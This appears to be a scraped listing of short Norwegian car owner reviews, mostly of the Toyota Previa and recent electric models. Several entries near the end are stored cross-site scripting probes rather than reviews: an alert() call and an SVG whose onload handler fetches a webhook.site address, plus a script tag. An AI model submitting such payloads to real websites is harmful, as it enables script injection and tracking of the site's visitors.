Toyota Previa (2006)
Sett av 50 000 i året til fiksing
Toyota Previa (2006)
Skiftet Turbo ved 200000 km har nå gått over 300000 km . Ingen store reparasjoner kun fast olje og filterskifte 1 gang i året. Har ingen problemer med å anbefale denne bilen. Er meget fornøyd
Toyota Previa (2005)
Topp bil for barnefamilier, barne vognen kan kjøres rett inn. Voksne kan sitte greit på de bakerste setene. Forsatt litt baggasjerom selv om alle setene er satt inn.
Toyota Previa (2005)
Kjempe bil, fortsatt kompakt og fin i undervognsstag, deler etc
Toyota Previa (2004)
Eid bilen over 10 år og er kjempe fornøyd! Slitasjedeler fra Toyota er dyre men heldigvis er det veldig bra utvalg hos bildeler.no og skruvat osv. Ett godt kjøp. Pass på rust understell, kanaler
Toyota Previa (2002)
Dritt bil fra Toyota
Toyota Previa (2002)
Topp bil, aldri noe galt.
Toyota Previa (2002)
Helt fantastisk familiebil. Et hav av plass og geniale løsninger. MÅ ikke finne på å kjøpe denne med diesel. disse motorene er kjent for både turbohavari og motorhavari. Dyre i vedlikehold. Mitt
Volvo XC40 (2024)
Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!
Skoda Enyaq (2025)
Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste
Volvo EX30 (2025)
Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des
Skoda Enyaq (2023)
Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi
Mazda CX-5 (2013)
Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.